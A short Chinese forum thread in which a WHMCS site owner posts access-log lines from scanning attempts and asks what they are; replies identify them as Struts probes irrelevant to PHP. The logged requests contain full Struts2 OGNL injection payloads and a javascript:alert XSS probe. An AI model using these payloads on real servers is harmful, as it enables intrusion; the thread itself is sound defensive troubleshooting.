升级了WHMCS，忘记把admin删掉，结果有人搞事……

★Extreme★

1. 220.181.165.135 - - [07/Aug/2013:15:45:01 +0800] "GET /admin/login.php?struts&(a)(('\x5Cu0023_memberAccess.allowStaticMethodAccess\x5Cu003dtrue')(z))&(b)(('\x5Cu0023context[\x5C'xwork.MethodAccessor.denyMethodExecution\x5C']\x5Cu003dfalse')(z))&(c)(('\x5Cu0023_memberAccess.excludeProperties\x5Cu003d{}')(z))&(d)(('\x5Cu0023a_str\x5Cu003d\x5C'814F60BD-F6DF-4227-\x5C'')(z))&(e)(('\x5Cu0023b_str\x5Cu003d\x5C'86F5-8D9FBF26A2EB\x5C'')(z))&(n)(('\x5Cu0023a_resp\[email protected]@getResponse()')(z))&(o)(('\x5Cu0023a_resp.getWriter().println(\x5Cu0023a_str\x5Cu002B\x5Cu0023b_str)')(z))&(p)(('\x5Cu0023a_resp.getWriter().flush()')(z))&(q)(('\x5Cu0023a_resp.getWriter().close()')(z)) HTTP/1.1" 200 4509 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"

复制代码

1. 220.181.165.134 - - [07/Aug/2013:15:45:02 +0800] "GET /admin/dologin.php?redirect%3A%24%7B%23a_str%3Dnew%20java.lang.String%28%27814F60BD-F6DF-4227-%27%29%2C%23b_str%3Dnew%20java.lang.String%28%2786F5-8D9FBF26A2EB%27%29%2C%23a_resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23a_resp.getWriter%28%29.println%28%23a_str.concat%28%23b_str%29%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29%7D HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"

复制代码

1. 220.181.165.132 - - [07/Aug/2013:15:45:05 +0800] "GET /admin/login.php?action=resetjavascript:alert(9527) HTTP/1.1" 200 2679 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1" "-"

复制代码

连续搞了很多次，N多IP，邮箱都爆了……
表示看了很久都看不出什么东西，朋友说是struts，WHMCS和struts无关吧？

DOS

1. (('\x5Cu0023a_resp\[email protected]@getResponse()')(z))&(o)

复制代码

你朋友根据这个来看的吧？

★Extreme★

DOS 发表于 2013-8-8 10:10
你朋友根据这个来看的吧？

不知道，我在观察日志，挺多的

hablahjeejee

whmcs php的，不可能有java的struts漏洞哈。